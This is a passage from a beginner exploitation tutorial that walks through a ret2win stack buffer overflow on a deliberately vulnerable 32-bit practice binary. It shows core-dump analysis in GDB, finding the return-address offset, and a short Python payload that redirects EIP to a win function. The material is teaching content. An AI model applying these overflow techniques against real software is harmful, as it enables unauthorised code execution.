  • Stripped: No - This indicates that the binary contains its symbol information, making it easier to debug and analyze. While this is beneficial for development, it can also aid attackers in crafting exploits.

I understand that these security mitigations can be challenging to grasp, but bear with me—we’ll take it step by step. For now, just remember that we’ve disabled all security checks, allowing us to focus on the fundamentals of a vanilla buffer overflow.

Crashing the Program

When we run the program, we notice that it accepts input as expected:

$ ./vuln 
Enter some text:
AAAAAAA
Try Again!

Everything seems normal, but what happens if we provide a larger input, like 100 A’s? Sounds interesting—let’s give it a shot! :)

$ ./vuln 
Enter some text:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault

So, what is this “Segmentation fault”? A Segmentation fault occurs when a program tries to access a memory segment that it’s not allowed to. This typically happens due to issues like buffer overflows, where the program writes more data to a buffer than it can hold. In our case, by inputting a string that’s too long, we’ve overwritten memory that the program shouldn’t touch, leading to the abrupt termination of the program.

But how does writing more data lead to accessing restricted memory segments? Let’s take a closer look.

Generating and Analyzing Core Dumps

Earlier, we discussed the different types of ELF files, including the CORE ELF file, which is created when a process crashes. Let’s enable core dump generation and crash our program to see this in action.

First, we need to set the limit for core file size to unlimited:

$ ulimit -c unlimited

Next, we run our vulnerable program:

$ ./vuln 
Enter some text:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)

After crashing the program, we can see that a core file has been generated, typically named core:

$ file core 
core: ELF 32-bit LSB core file, Intel 80386, version 1 (SYSV), SVR4-style, from './vuln', real uid: 1000, effective uid: 1000, real gid: 1000, effective gid: 1000, execfn: './vuln', platform: 'i686'

Let’s examine the core dump using GDB.

Install pwndbg

To install pwndbg, simply follow these steps:

$ git clone https://github.com/pwndbg/pwndbg
$ cd pwndbg
$ ./setup.sh

Load the core dump in gdb:

$ gdb --quiet -core core 
[New LWP 17510]
Core was generated by `./vuln'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x41414141 in ?? ()
------- tip of the day (disable with set show-tips off) -------
Pwndbg resolves kernel memory maps by parsing page tables (default) or via monitor info mem QEMU gdbstub command (use set kernel-vmmap-via-page-tables off for that)
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
──────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────
 EAX  0xff93b8f0 ◂— 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
 EBX  0x41414141 ('AAAA')
 ECX  0xf7ebf8ac ◂— 0
 EDX  0
 EDI  0xf7f25b60 ◂— 0
 ESI  0xff93ba1c —▸ 0xff93d8e4 ◂— 'SHELL=/usr/bin/bash'
 EBP  0x41414141 ('AAAA')
 ESP  0xff93b940 ◂— 'AAAAAAAAAAAAAAAAAAAA'
 EIP  0x41414141 ('AAAA')
────────────────────────────[ DISASM / i386 / set emulate on ]────────────────────────────
Invalid address 0x41414141










────────────────────────────────────────[ STACK ]─────────────────────────────────────────
00:0000│ esp 0xff93b940 ◂— 'AAAAAAAAAAAAAAAAAAAA'
... ↓        4 skipped
05:0014│     0xff93b954 ◂— 0
06:0018│     0xff93b958 —▸ 0xf7cc6069 ◂— add ebx, 0x1f7dab
07:001c│     0xff93b95c —▸ 0xf7cacd43 ◂— add esp, 0x10
──────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────
0 0x41414141 None
   1 0x41414141 None
   2 0x41414141 None
   3 0x41414141 None
   4 0x41414141 None
   5 0x41414141 None
   6      0x0 None
──────────────────────────────────────────────────────────────────────────────────────────

We can see that EIP register contains 0x41414141 which is AAAA in hex. The EIP register points to next instruction to be executed. You can refer x86 Assembly Series. Due to supplying multiple A’s into the program buffer, they oveflowed the stack and ended up in the EIP register. Refer to the Stack Working section.

Now that we understand how to overwrite the return address, the next question is: how do we determine how many ‘A’s are actually overwriting it? To tackle this, we can generate a unique 4-byte pattern. This pattern will help us identify the exact offset needed to reach the return address.

$ pwn cyclic 100
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa

Next, copy this unique pattern and use it as input for the vulnerable binary:

$ ./vuln 
Enter some text:
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa
Segmentation fault (core dumped)

Now, let’s analyze the generated core dump:

$ gdb -core core 
...
 ESP  0xff949430 ◂— 'uaaavaaawaaaxaaayaaa'
 EIP  0x61616174 ('taaa')
────────────────────────────[ DISASM / i386 / set emulate on ]────────────────────────────
Invalid address 0x61616174
...

From this analysis, we see that 0x61616174 (which corresponds to ’taaa’) has overwritten the return address.

To find the offset where this occurs, we can use the following command:

$ cyclic -l 0x61616174
76

This tells us that the offset required to overwrite the return address is 76 bytes, which ultimately affects the EIP register.

Let’s generate a exploit in Python and save it as exploit.py

#!/usr/bin/python2

offset = 76

payload = "A"*offset 
payload += "BBBB" # EIP

print(payload)

Now, use this exploit to verify our results:

$ ./exploit.py  | ./vuln 
Enter some text:
Segmentation fault (core dumped)

$ gdb -core core
...
 ESP  0xffc95890 —▸ 0xffc95800 ◂— 0
 EIP  0x42424242 ('BBBB')
────────────────────────────[ DISASM / i386 / set emulate on ]────────────────────────────
Invalid address 0x42424242
...

As we can see, we’ve successfully taken control of the EIP register! 🎉 Now we can point it anywhere else, opening up exciting possibilities for exploitation! 🚀

What if we point to the win function we have in our vuln.c? First, let’s get the address of the win function:

$ nm vuln | grep win
08049186 T win

So, the address of the win function is 0x08049186. Now, let’s modify our exploit to use this address in hexadecimal byte format:

#!/usr/bin/python2

offset = 76

payload = "A"*offset 
#payload += "BBBB" # EIP
payload += "\x08\x04\x91\x86"

print(payload)

However, when we run the exploit, we see that it failed. 😢

$ ./exploit.py | ./vuln 
Enter some text:
Segmentation fault (core dumped)

Let’s check the core dump:

$ gdb -core core 
...
 ESI  0xfffbe16c —▸ 0xfffbe8e4 ◂— 'SHELL=/usr/bin/bash'
 EBP  0x41414141 ('AAAA')
 ESP  0xfffbe090 —▸ 0xfffbe000 ◂— 0
 EIP  0x86910408
────────────────────────────[ DISASM / i386 / set emulate on ]────────────────────────────
Invalid address 0x86910408
...

Here, we see that EIP contains the address 0x86910408, which is the reverse of our original address 0x08049186. The reason for this is that x86 architecture uses Little Endian format. This means that when a multi-byte value is stored, the least significant byte is placed at the lowest memory address.

To correctly overwrite the EIP with the address of the win function, we need to reverse the byte order in our payload:

#!/usr/bin/python2

offset = 76

payload = "A" * offset 
# payload += "BBBB"  # EIP
# payload += "\x08\x04\x91\x86"
payload += "\x86\x91\x04\x08"  # Correct byte order for EIP


print(payload)

With this final adjustment, we should be able to redirect the flow of execution right to our win function. Now, fingers crossed—let’s run the exploit and see if we land in the win function!

$ ./exploit.py | ./vuln 
Enter some text:
You've reached the win function! 🎉

Voilà! 🎊 We’ve successfully redirected the program’s execution to the win function! Often, developers include these testing or debugging functions during development and forget to remove or disable them later. These so-called “dead code” functions can become vulnerabilities, as attackers can exploit them to gain unintended control over program flow. In CTFs, this technique is often referred to as ret2win.

Conclusion

In this part, we explored basic binary analysis and learned how to control EIP to redirect execution flow to unintended functions. In the next section, we’ll dive into exploitation techniques for binaries without “win” functions and ways to bypass common security mitigations.


References

Books

Articles